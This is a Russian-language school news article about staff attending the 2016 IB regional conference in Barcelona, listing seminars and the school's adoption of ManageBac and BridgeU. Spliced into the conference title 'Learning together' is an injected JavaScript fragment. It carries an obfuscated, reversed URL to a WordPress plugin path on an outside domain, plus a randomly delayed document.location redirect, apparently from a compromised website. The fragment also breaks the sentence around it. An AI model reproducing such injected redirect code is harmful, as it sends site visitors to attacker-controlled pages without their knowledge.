logo

Здравствуй, красавица Барселона!

Новый 2016-2017 учебный год с первых дней своей работы насыщен большим количеством важных и интересных событий, одним из которых явилось участие наших учителей во главе с директором школы, Светланой Сабировной Куличенко в ежегодной Региональной Конференции Международного Бакалавриата стран Африки, Европы и Ближнего Востока в Барселоне с 6-го по 8-ое октября 2016 года.
Международный Бакалавриат, как одна из лидирующих образовательных технологий современного мира в Испании, существует с 1977 года. В настоящее время 97 испанских школ, девять из которых находятся в самой Барселоне, предлагают одну или более IB программы, ставя Испанию на второе место по числу IB школ в региона стран Африки, Европы и Ближнего Востока.
Темой ежегодной Региональной конференции был следующий заголовок «Learning toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}together». Для всех участников конференция была уникальной возможностью поделиться своим опытом и достижениями. Она позволила всем нашим коллегам повысить свою квалификацию посредством участия во многих семинарах на протяжении трех дней.
Одновременно с семинарами и пленарными заседаниями проходила выставка учебников последних изданий для всех IB программ, представленных ведущими издательствами мира в области образования таких, Oxford University Press, Cambridge University Press и другие. В добавление к учебникам на выставке презентовали свои образовательные продукты и технологии известные в IB пространстве такие компании, как ManageBac, BridgeU, PASCO scientific, Kognity, Lanterna, International New York Times, SciChem international и другие.
Представители нашей школы участвовали во многих семинарах и сессиях, связанных с PYP, MYP и DP программами. В работе данных семинаров участвовали координатор PYP Ольга Сергеевна Петрова, завкафедрой иностранных языков Яна Андреевна Миленина, координатор DP Владимир Викторович Емануилов и директор Международной общеобразовательной школы «Интеграция XXI век» Светлана Сабировна Куличенко.
Вот названия некоторых семинаров, на которых проходило обучение нашей команды учителей:
«The DP evaluation process – the self-study – an integral part of school development»
«PYP Update»
«MYP Update»
«DP academic upgrade»
«The future of ManageBac»
«Summative PYP Unit Assessment»
«Diploma Programme Assessment»

После конференции, проведя рефлексию нашего участия в различных семинарах мы пришли к выводу, что наша школа должна взять на вооружение ManageBac продукт с целью повышения эффективности работы в Дипломной Программе и с целью минимизировать бумажную документацию. При этом данный продукт позволяет обеспечить прозрачность нашей учебной работы для всех членов школьного сообщества. В дополнение к этому школа подписала контракт с представительством BridgeU на использование пакета услуг, которые помогут DP учащимся выбрать университеты, в которых они смогут продолжить свое образование практически в любом учебном заведении мира. Также BridgeU будет оказывать каждому студенту поддержку в оформлении необходимой документации для поступления в выбранный ВУЗ.
Наша команда участников благодарит свою школу и организаторов проведения региональной IB конференции в Барселоне за неоценимую возможность участвовать в её работе.

22 октября 2016 г.
В.В.Емануилов

036b733f-631f-4a0f-81ce-25d8e64a791c1 20161007_153434 20161007_153645 20161009_1043441 img_0767 img_0785